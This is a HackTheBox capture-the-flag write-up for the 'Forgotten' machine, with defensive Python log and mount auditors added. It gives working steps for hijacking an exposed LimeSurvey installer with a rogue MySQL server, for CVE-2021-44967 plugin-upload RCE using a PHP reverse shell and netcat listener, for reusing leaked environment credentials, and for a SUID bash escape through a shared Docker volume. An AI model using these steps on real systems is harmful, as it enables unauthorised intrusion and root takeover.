
Hackthebox: Forgotten Writeup

I write detailed writeups on HackTheBox, PicoCTF and other CTF challenges. Passionate about web exploitation, Active Directory attacks and ethical hacking

Summary

Forgotten is a HackTheBox machine centered around an exposed LimeSurvey installer endpoint that was never properly secured post-deployment. By spinning up a rogue MySQL server, an attacker can hijack the installation process to create a fresh admin account on the target's LimeSurvey instance. From there, a known RCE vulnerability (CVE-2021-44967) in LimeSurvey's plugin upload feature grants a foothold inside a Docker container. Environment variable leakage exposes the container user's password, allowing lateral movement to the host OS via SSH. Finally, a mounted Docker volume shared between the container and the host enables a classic SUID bash privilege escalation to achieve root on the underlying system.


Reconnaissance

Port Scan

nmap -sC -sV -A <MACHINE-IP> -oA nmap

Open ports:

Port Service Version
22 SSH OpenSSH 8.9p1 (Ubuntu)
80 HTTP Apache 2.4.56 (Debian)

The HTTP root returns a 403 Forbidden. The Server header leaks Apache/2.4.56 (Debian) and the nmap host info reveals the internal Docker IP 172.17.0.2, hinting at a containerized web application.

Directory Enumeration

ffuf -u http://forgotten.vl/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Key finding:

survey    [Status: 301]

Browsing to http://forgotten.vl/survey reveals a LimeSurvey application.


Initial Access

Stage 1 - Exploiting the Exposed LimeSurvey Installer

Navigating to http://forgotten.vl/survey/index.php?r=installer/precheck showed that the LimeSurvey installer was still accessible and had not been removed after deployment — a critical misconfiguration.

Pre-installation check (Step 3) leaked the version:

LimeSurvey 6.3.7

A quick search revealed CVE-2021-44967 — an authenticated RCE via plugin upload in LimeSurvey. The catch: admin access is required. The installer gave a path to create our own admin account.

Stage 2 - Rogue MySQL Server

The installer's Step 4 (Database Configuration) asks for a database host. Since we control what host the target application connects to, we stood up our own MySQL server:

docker run -p 3306:3306 --rm --name evil-mysql \
  -e MYSQL_ROOT_PASSWORD=pass123 mysql:latest

Verified it was listening:

netstat -tanp | grep -i list
# tcp  0.0.0.0:3306  LISTEN  docker-proxy

In the installer form (Step 4 — Configuration), we provided:

Field Value
Database type MySQL
Database location <YOUR-IP>:3306 (our Kali IP)
Database user root
Database password pass123
Database name test
Table prefix lime_

Proceeding to Step 5, the installer reported "Database doesn't exist" and offered to create it — we clicked Create database, which our rogue MySQL accepted. After clicking Populate database, Step 6 (Administrator Settings) appeared, letting us set a known admin password.

Installation completed successfully with our own admin credentials.

Stage 3 - RCE via LimeSurvey Plugin Upload (CVE-2021-44967)

With admin access at http://forgotten.vl/survey/index.php/admin/authentication/sa/login, we exploited the plugin upload functionality.

Crafted a malicious plugin archive:

config.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>ExamplePlugin</name>
        <type>plugin</type>
        <author>exploitnotes</author>
        <version>1.0</version>
        <description>Example Plugin</description>
    </metadata>
    <compatibility>
        <version>6.3</version>
    </compatibility>
</config>

rev-shell.php: A standard PHP reverse shell (pentestmonkey) pointing back to <YOUR-IP>:4444.

zip evil.zip rev-shell.php config.xml

Upload steps:

  1. Navigate to Configuration → Plugins → Upload & Install
  2. Upload evil.zip
  3. Confirm installation
  4. Start a netcat listener: nc -lvnp 4444
  5. Trigger the shell: curl http://forgotten.vl/survey/upload/plugins/ExamplePlugin/rev-shell.php

Shell received:

limesvc@efaa6f5097ed:/$ whoami
limesvc
limesvc@efaa6f5097ed:/$ id
uid=2000(limesvc) gid=2000(limesvc) groups=2000(limesvc),27(sudo)
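From the defender's side, the two stages above leave distinctive entries in the Apache access log: requests to the installer route and a direct request for a PHP file under the plugin upload directory. The following Python is an added example, not code from the writeup, that scans combined-format log lines for those two patterns; the sample lines are constructed and only mirror the request shapes shown on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Request shapes taken from this chain: the installer route (query or path
# style) and a PHP file executed straight out of the plugin upload directory.
INSTALLER_PATH = re.compile(r'/survey/index\.php/installer(/|$)')
PLUGIN_PHP = re.compile(r'/survey/upload/plugins/[^/]+/.*\.php$')


def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    route = parse_qs(url.query).get('r', [''])[0]
    if route.startswith('installer') or INSTALLER_PATH.search(url.path):
        return 'installer-access'
    if PLUGIN_PHP.search(url.path):
        return 'plugin-php-execution'
    return None


def scan(lines):
    """Return (ip, status, label, target) for every flagged line."""
    findings = []
    for line in lines:
        label = classify(line)
        if label:
            m = LOG_RE.match(line)
            findings.append((m.group('ip'), int(m.group('status')), label, m.group('target')))
    return findings


# Constructed sample log lines (not captured from the machine).
SAMPLE_LOG = """\
10.10.14.5 - - [11/Jan/2024:10:01:02 +0000] "GET /survey/index.php?r=installer/precheck HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [11/Jan/2024:10:02:10 +0000] "GET /survey/index.php/installer HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [11/Jan/2024:10:20:01 +0000] "GET /survey/upload/plugins/ExamplePlugin/rev-shell.php HTTP/1.1" 200 0 "-" "curl/8.4.0"
10.10.14.9 - - [11/Jan/2024:10:21:00 +0000] "GET /survey/upload/plugins/ExamplePlugin/config.xml HTTP/1.1" 200 340 "-" "curl/8.4.0"
192.168.1.20 - - [11/Jan/2024:10:22:30 +0000] "GET /survey/index.php?r=survey/index&sid=1234 HTTP/1.1" 200 4500 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A 200 on the installer route after go-live is itself the misconfiguration; the plugin-PHP hit is the execution of the uploaded file, so both deserve an alert rather than a log line.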

Post-Exploitation

Docker Container Confirmation

The presence of /.dockerenv and the hostname efaa6f5097ed, combined with the ifconfig output showing inet 172.17.0.2, confirmed we were inside a Docker container — not the host OS directly.

Credential Discovery via Environment Variables

limesvc@efaa6f5097ed:/$ env

The environment dump revealed:

LIMESURVEY_ADMIN=limesvc
LIMESURVEY_PASS=5W5HN4K4GCXf9E

These credentials were baked into the container at build time.

Sudo Escalation Inside Container

sudo -l
# (using LIMESURVEY_PASS as password)
# User limesvc may run the following commands: (ALL : ALL) ALL

sudo -i
root@efaa6f5097ed:~#

Root inside the container — but still containerized.


Host Escape & Privilege Escalation

Volume Mount Enumeration

Inspecting mounts revealed a bind mount:

/dev/root on /var/www/html/survey type ext4 (rw,relatime...)

The container's /var/www/html/survey directory was mounted read-write from the host at /opt/limesurvey. Crucially, files written inside the container appear on the host with their original permissions — including SUID bits.

SUID Bash Binary Drop

From inside the container (as root):

cp /bin/bash /var/www/html/survey/bash
chmod +s /var/www/html/survey/bash
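The condition that makes the drop above work is a writable mount without nosuid that the host also honours. As an added example (not the writeup's own code), the Python below parses `mount` output for writable mount points lacking nosuid and walks a directory tree for setuid regular files, which is the check a container or host audit would run against this web root; the sample mount lines are constructed.

```python
import os
import re
import stat

# One line of `mount` output, e.g.
# "/dev/root on /var/www/html/survey type ext4 (rw,relatime)"
MOUNT_RE = re.compile(
    r'^(?P<src>\S+) on (?P<target>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)$'
)
# Pseudo and container-rootfs filesystems that are not host bind mounts.
SKIP_FSTYPES = {'proc', 'sysfs', 'tmpfs', 'overlay', 'cgroup', 'devpts', 'mqueue'}


def parse_mounts(text):
    """Parse `mount` output; 'opts' becomes a set of mount options."""
    entries = []
    for line in text.splitlines():
        m = MOUNT_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry['opts'] = set(entry['opts'].split(','))
            entries.append(entry)
    return entries


def risky_bind_mounts(text):
    """Writable mount points without nosuid: setuid files planted there are honoured."""
    return [e['target'] for e in parse_mounts(text)
            if e['fstype'] not in SKIP_FSTYPES
            and 'rw' in e['opts'] and 'nosuid' not in e['opts']]


def find_setuid(root):
    """Walk a directory tree and return its setuid regular files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


# Constructed sample of `mount` output inside a container (not from the page).
SAMPLE_MOUNT = """\
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/A)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
/dev/root on /var/www/html/survey type ext4 (rw,relatime)
"""

if __name__ == '__main__':
    print('writable mounts without nosuid:', risky_bind_mounts(SAMPLE_MOUNT))
    print('setuid files in web root:', find_setuid('/var/www/html/survey'))
```

The nosuid flag has to be present on the host's own mount of /opt/limesurvey to stop a setuid binary from being honoured there; the container-side view only shows where such a file can be planted, so the durable fix is not running the container as root with a writable host bind mount.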

SSH to Host

The credentials discovered in the container's environment also worked for SSH on the host:

ssh limesvc@forgotten.vl
# Password: 5W5HN4K4GCXf9E

User flag obtained:

limesvc@forgotten:~$ cat user.txt
[REDACTED]

Root via SUID Bash

The SUID bash binary dropped through the shared volume appeared at /opt/limesurvey/bash on the host:

limesvc@forgotten:/opt/limesurvey$ ./bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
[REDACTED]

Attack Chain

Exposed LimeSurvey installer (/survey/index.php?r=installer)
        │
        ▼
Rogue MySQL server → hijack DB config step → create admin account
        │
        ▼
Authenticated as admin → CVE-2021-44967 plugin upload RCE
        │
        ▼
Shell as limesvc inside Docker container
        │
        ▼
Environment variables leak LIMESURVEY_PASS
        │
        ▼
sudo -i → root inside container
        │
        ▼
Shared volume (/var/www/html/survey ↔ /opt/limesurvey) → drop SUID bash
        │
        ▼
SSH to host as limesvc → ./bash -p → root on host

Key Vulnerabilities

1. Exposed installer endpoint — LimeSurvey installer left accessible in production
   Impact: allows full application reinstallation and admin account creation
2. Rogue database server acceptance — installer trusts any externally provided DB host without validation
   Impact: enables an attacker to supply and control the database
3. CVE-2021-44967 — LimeSurvey ≤ 6.3.7 authenticated RCE via plugin upload
   Impact: remote code execution as the web server user
4. Credentials in environment variables — LIMESURVEY_PASS exposed via env inside the container
   Impact: password reuse enables SSH access to the host
5. Docker volume shared with host (rw) — container web root bind-mounted to the host filesystem
   Impact: container escape via SUID binary drop
6. SUID bash privilege escalation — arbitrary file write as container root → SUID bash on host
   Impact: full host root access
